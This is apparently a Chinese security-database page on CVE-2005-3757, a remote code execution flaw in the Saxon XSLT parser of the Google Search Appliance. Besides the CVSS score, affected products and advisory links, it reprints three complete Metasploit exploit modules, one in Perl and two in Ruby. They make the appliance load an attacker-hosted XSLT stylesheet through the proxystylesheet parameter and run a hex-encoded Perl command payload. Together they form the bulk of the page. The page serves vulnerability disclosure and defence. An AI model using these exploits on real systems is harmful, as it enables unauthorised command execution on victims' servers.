CVE-2005-3757
CVSS7.5
发布时间 :2005-11-22 16:03:00
修订时间 :2011-03-07 21:27:05
NMCOEP    

[原文]The Saxon XSLT parser in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to obtain sensitive information and execute arbitrary code via dangerous Java class methods in select attribute of xsl:value-of tags in XSLT style sheets, such as (1) system-property, (2) sys:getProperty, and (3) run:exec.


[CNNVD]Google搜索工具信息泄漏及任意代码执行漏洞(CNNVD-200511-320)

        Google搜索工具是一款大型的企业级硬件搜索工具。
        Google Mini 搜索工具(可能也包括Google 搜索工具)中的Saxon XSLT解析器,允许远程攻击者通过危险的XSLT类型表格的标签值属性中的java类方式,诸如 (1) system-property, (2) sys:getProperty, 和 (3) run:exec,来获得敏感信息和执行任意的代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/h:google:search_applianceGoogle Search Appliance
cpe:/h:google:mini_search_applianceGoogle Mini Search Appliance

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3757
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3757
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-320
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/15509
(PATCH)  BID  15509
http://www.securityfocus.com/archive/1/archive/1/417310/30/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051121 Google Search Appliance proxystylesheet Flaws
http://www.osvdb.org/20981
(PATCH)  OSVDB  20981
http://securitytracker.com/id?1015246
(VENDOR_ADVISORY)  SECTRACK  1015246
http://metasploit.com/research/vulns/google_proxystylesheet/
(VENDOR_ADVISORY)  MISC  http://metasploit.com/research/vulns/google_proxystylesheet/
http://www.vupen.com/english/advisories/2005/2500
(UNKNOWN)  VUPEN  ADV-2005-2500
http://secunia.com/advisories/17644
(VENDOR_ADVISORY)  SECUNIA  17644

- 漏洞信息

Google搜索工具信息泄漏及任意代码执行漏洞
高危 设计错误
2005-11-22 00:00:00 2005-11-29 00:00:00
远程  
        Google搜索工具是一款大型的企业级硬件搜索工具。
        Google Mini 搜索工具(可能也包括Google 搜索工具)中的Saxon XSLT解析器,允许远程攻击者通过危险的XSLT类型表格的标签值属性中的java类方式,诸如 (1) system-property, (2) sys:getProperty, 和 (3) run:exec,来获得敏感信息和执行任意的代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.google.com/enterprise/gsa/index.html

- 漏洞信息 (1333)

Google Search Appliance proxystylesheet XSLT Java Code Execution (EDBID:1333)
hardware remote
2005-11-20 Verified
80 H D Moore
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::google_proxystylesheet_exec;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
use IO::Select;
my $advanced = { };

my $info =
{
	'Name'           => 'Google Appliance ProxyStyleSheet Command Execution',
	'Version'        => '$Revision: 1.1 $',
	'Authors'        => [ 'H D Moore <hdm [at] metasploit.com>' ],
	
	'Description'    => 
		Pex::Text::Freeform(qq{
			This module exploits a feature in the Saxon XSLT parser used by
		the Google Search Appliance. This feature allows for arbitrary
		java methods to be called. Google released a patch and advisory to 
		their client base in August of 2005 (GA-2005-08-m). The target appliance
		must be able to connect back to your machine for this exploit to work.
		}),
		
	'Arch'           => [ ],
	'OS'             => [ ],
	'Priv'           => 0,
	'UserOpts'       => 
		{
			'RHOST'    => [ 1, 'HOST', 'The address of the Google appliance'],
			'RPORT'    => [ 1, 'PORT', 'The port used by the search interface', 80],
			'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
			'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
			'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
		},
	'Payload'        => 
		{
			'Space'    => 1024,
			'Keys'     => [ 'cmd' ],
		},
	'Refs'           => 
		[
			['OSVDB', 20981],
		],
	'DefaultTarget'  => 0,
	'Targets'        =>
		[
			[ 'Google Search Appliance']
		],
	'Keys'           => [ 'google' ],

	'DisclosureDate' => 'Aug 16 2005',
};

sub new
{
	my $class = shift;
	my $self;
	
	$self = $class->SUPER::new(
			{ 
				'Info'     => $info,
				'Advanced' => $advanced,
			},
			@_);

	return $self;
}

sub Check {
	my $self = shift;
	my $s = $self->ConnectSearch;
	
	if (! $s) {
		return $self->CheckCode('Connect');
	}
	
	my $url =
		"/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
		"site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
		"output=xml_no_dtd&".
		"q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
		"proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";
	
	$s->Send("GET $url HTTP/1.0\r\n\r\n");
	my $page = $s->Recv(-1, 5);
	$s->Close;

	if ($page =~ /cannot be resolved to an ip address/) {
		$self->PrintLine("[*] This system appears to be vulnerable >:-)");
		return $self->CheckCode('Confirmed');
	}
	
	if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
		$self->PrintLine("[*] This system appears to be patched");
	}
	
	$self->PrintLine("[*] This system does not appear to be vulnerable");
	return $self->CheckCode('Safe');	
}


sub Exploit
{
	my $self = shift;
	my ($s, $page);
	
	# Request the index page to obtain a redirect response
	$s = $self->ConnectSearch || return;
	$s->Send("GET / HTTP/1.0\r\n\r\n");
	$page = $s->Recv(-1, 5);
	$s->Close;

	# Parse the redirect to get the client and site values
	my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im;
	if (! $goog_site || ! $goog_clnt) {
		$self->PrintLine("[*] Invalid response to our request, is this a Google appliance?");
		#$self->PrintLine($page);
		#!!! return;
		$goog_site = 'test';
		$goog_clnt = 'test';
	}

	# Create the listening local socket that will act as our HTTP server
	my $lis = IO::Socket::INET->new(
			LocalHost => $self->GetVar('HTTPHOST'),
			LocalPort => $self->GetVar('HTTPPORT'),
			ReuseAddr => 1,
			Listen    => 1,
			Proto     => 'tcp');
	
	if (not defined($lis)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}
	my $sel = IO::Select->new($lis);
	
	# Send a search request with our own address in the proxystylesheet parameter
	my $query = Pex::Text::AlphaNumText(int(rand(32))+1);
	
	my $proxy =
		"http://".
		($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).
		":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl";
	
	my $url = 
		"/search?client=". $goog_clnt ."&site=". $goog_site .
		"&output=xml_no_dtd&proxystylesheet=". $proxy .
		"&q=". $query ."&proxyreload=1";

	$self->PrintLine("[*] Sending our malicious search request...");
	$s = $self->ConnectSearch || return;
	$s->Send("GET $url HTTP/1.0\r\n\r\n");
	$page = $s->Recv(-1, 3);
	$s->Close;

	$self->PrintLine("[*] Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");
	
	# Did we receive a connection?
	my @r = $sel->can_read(30);
	
	if (! @r) {
		$self->PrintLine("[*] No connection received from the search engine, possibly patched.");
		$lis->close;
		return;
	}

	my $c = $lis->accept();
	if (! $c) {
		$self->PrintLine("[*] No connection received from the search engine, possibly patched.");
		$lis->close;
		return;	
	}

	my $cli = Msf::Socket::Tcp->new_from_socket($c);
	$self->PrintLine("[*] Connection received from ".$cli->PeerAddr."...");	
	$self->ProcessHTTP($cli);
	return;
}

sub ConnectSearch {
	my $self = shift;
	my $s = Msf::Socket::Tcp->new(
		'PeerAddr' => $self->GetVar('RHOST'),
		'PeerPort' => $self->GetVar('RPORT'),
		'SSL'      => $self->GetVar('SSL')
	);
	
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}
	return $s;
}

sub ProcessHTTP
{
	my $self = shift;
	my $cli  = shift;
	my $targetIdx = $self->GetVar('TARGET');
	my $target    = $self->Targets->[$targetIdx];
	my $ret       = $target->[1];
	my $shellcode = $self->GetVar('EncodedPayload')->Payload;
	my $content;
	my $rhost;
	my $rport;

	# Read the first line of the HTTP request
	my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));

	# The way we call Runtime.getRuntime().exec, Java will split
	# our string on whitespace. Since we are injecting via XSLT,
	# inserting quotes becomes a huge pain, so we do this...
	my $exec_str = 
		'/usr/bin/perl -e system(pack(qq{H*},qq{' .
		unpack("H*", $self->GetVar('EncodedPayload')->RawPayload).
		'}))';

	# Load the template from our data section, we have to manually
	# seek and reposition to allow the exploit to be used more
	# than once without a reload.
	seek(DATA, 0, 0);
	while(<DATA>) { last if /^__DATA__$/ }
	while(<DATA>) {	$content .= $_ }

	# Insert our command line
	$content =~ s/:x:MSF:x:/$exec_str/;
	
	# Send it to the requesting appliance
	$rport = $cli->PeerPort;
	$rhost = $cli->PeerAddr;
	$self->PrintLine("[*] HTTP Client connected from $rhost, sending XSLT...");
	
	my $res = "HTTP/1.1 200 OK\r\n" .
	          "Content-Type: text/html\r\n" .
	          "Content-Length: " . length($content) . "\r\n" .
	          "Connection: close\r\n" .
	          "\r\n" .
	          $content;

	$self->PrintLine("[*] Sending ".length($res)." bytes...");
	$cli->Send($res);
	$cli->Close;
}

1;

# milw0rm.com [2005-11-20]
		

- 漏洞信息 (16907)

Google Appliance ProxyStyleSheet Command Execution (EDBID:16907)
hardware webapps
2010-07-01 Verified
0 metasploit
N/A [点击下载]
##
# $Id: google_proxystylesheet_exec.rb 9653 2010-07-01 23:33:07Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Google Appliance ProxyStyleSheet Command Execution',
			'Description'    => %q{
				This module exploits a feature in the Saxon XSLT parser used by
			the Google Search Appliance. This feature allows for arbitrary
			java methods to be called. Google released a patch and advisory to
			their client base in August of 2005 (GA-2005-08-m). The target appliance
			must be able to connect back to your machine for this exploit to work.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9653 $',
			'References'     =>
				[
					['CVE', '2005-3757'],
					['OSVDB', '20981'],
					['BID', '15509'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 4000,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet netcat-e',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Aug 16 2005',
			'Stance'         => Msf::Exploit::Stance::Aggressive,
			'DefaultTarget' => 0))
	end

	# Handle incoming requests from the appliance
	def on_request_uri(cli, request)

		print_status("Handling new incoming HTTP request...")

		exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
		data = @xml_data.gsub(/:x:MSF:x:/, exec_str)
		send_response(cli, data)
	end

	def check
		res = send_request_cgi({
			'uri'      => '/search',
			'vars_get' =>
			{
				'client'          => rand_text_alpha(rand(15)+1),
				'site'            => rand_text_alpha(rand(15)+1),
				'output'          => 'xml_no_dtd',
				'q'               => rand_text_alpha(rand(15)+1),
				'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'
			}
		}, 10)

		if (res and res.body =~ /cannot be resolved to an ip address/)
			print_status("This system appears to be vulnerable")
			return Exploit::CheckCode::Vulnerable
		end

		if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)
			print_status("This system appears to be patched")
		end

		print_status("This system is not exploitable")
		return Exploit::CheckCode::Safe
	end


	def exploit

		# load the xml data
		path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml")
		fd = File.open(path, "rb")
		@xml_data = fd.read(fd.stat.size)
		fd.close

		print_status("Obtaining the appliance site and client IDs...")
		# Send a HTTP/1.0 request to learn the site configuration
		res = send_request_raw({
			'uri'     => '/',
			'version' => '1.0'
		}, 10)

		if !(res and res['location'] and res['location'] =~ /site=/)
			print_status("Could not read the location header: #{res.code} #{res.message}")
			return
		end

		m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)
		if !(m and m[1] and m[2])
			print_status("Invalid location header: #{res['location']}")
			return
		end

		print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
		start_service

		print_status("Requesting a search using our custom XSLT...")
		res = send_request_cgi({
			'uri'      => '/search',
			'vars_get' =>
			{
				'client'          => m[2],
				'site'            => m[1],
				'output'          => 'xml_no_dtd',
				'q'               => rand_text_alpha(rand(15)+1),
				'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
				'proxyreload'     => '1'
			}
		}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
			print_status("Waiting on the payload to execute...")
			select(nil,nil,nil,20)
		else
			print_status("No response from the server")
		end

		print_status("Shutting down the web service...")
		stop_service
	end

end
		

- 漏洞信息 (F82357)

Google Appliance ProxyStyleSheet Command Execution (PacketStormID:F82357)
2009-10-30 00:00:00
H D Moore  metasploit.com
exploit,java,arbitrary
CVE-2005-3757
[点击下载]

This Metasploit module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Google Appliance ProxyStyleSheet Command Execution',
			'Description'    => %q{
				This module exploits a feature in the Saxon XSLT parser used by
			the Google Search Appliance. This feature allows for arbitrary
			java methods to be called. Google released a patch and advisory to 
			their client base in August of 2005 (GA-2005-08-m). The target appliance
			must be able to connect back to your machine for this exploit to work.		
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-3757'],
					['OSVDB', '20981'],
					['BID', '15509'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 4000,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet netcat-e',
						}
				},		
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Aug 16 2005',
			'Stance'         => Msf::Exploit::Stance::Aggressive,
			'DefaultTarget' => 0))
	end

	# Handle incoming requests from the appliance
	def on_request_uri(cli, request)
	
		print_status("Handling new incoming HTTP request...")
		
		path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml")
		
		fd = File.open(path, "r")
		data = fd.read
		fd.close

		exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
		data.gsub!(/:x:MSF:x:/, exec_str)
		send_response(cli, data)
	end
	
	def check
		res = send_request_cgi({
			'uri'      => '/search',
			'vars_get' => 
			{
				'client'          => rand_text_alpha(rand(15)+1),
				'site'            => rand_text_alpha(rand(15)+1),
				'output'          => 'xml_no_dtd',
				'q'               => rand_text_alpha(rand(15)+1),
				'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'
			}
		}, 10)
		
		if (res and res.body =~ /cannot be resolved to an ip address/)
			print_status("This system appears to be vulnerable")
			return Exploit::CheckCode::Vulnerable
		end
		
		if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)
			print_status("This system appears to be patched")
		end
		
		print_status("This system is not exploitable")
		return Exploit::CheckCode::Safe
	end
	
	
	def exploit
	
		print_status("Obtaining the appliance site and client IDs...")
		# Send a HTTP/1.0 request to learn the site configuration
		res = send_request_raw({
			'uri'     => '/',
			'version' => '1.0'
		}, 10)
		
		if !(res and res['location'] and res['location'] =~ /site=/)
			print_status("Could not read the location header: #{res.code} #{res.message}")
			return
		end
		
		m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)
		if !(m and m[1] and m[2])
			print_status("Invalid location header: #{res['location']}")
			return		
		end
	
		print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
		start_service
	
		print_status("Requesting a search using our custom XSLT...")
		res = send_request_cgi({
			'uri'      => '/search',
			'vars_get' => 
			{
				'client'          => m[2],
				'site'            => m[1],
				'output'          => 'xml_no_dtd',
				'q'               => rand_text_alpha(rand(15)+1),
				'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
				'proxyreload'     => '1'
			}
		}, 25)
		
		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
			print_status("Waiting on the payload to execute...")
			sleep(20)
		else
			print_status("No response from the server")
		end
		
		print_status("Shutting down the web service...")
		stop_service
	end
	
end

    

- 漏洞信息

20981
Google Search Appliance proxystylesheet XSLT Java Code Execution
Remote / Network Access Other
Loss of Integrity
Exploit Public

- 漏洞描述

The Google Search Appliance contains a flaw that allows a remote attacker to execute arbitrary Java methods as an unprivileged user. The issue is due to the proxystylesheet parameter in the search request, which loads an external XSLT style sheet from a URL. The XSLT parser is based on Saxon, which allows Java method calls from within an XSLT document. This allows an attacker to execute arbitrary code and commands on the appliance.

- 时间线

2005-11-21 2005-06-10
2005-11-21 Unknow

- 解决方案

Upgrade to the version specified by Google advisory GA-2005-08-m, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站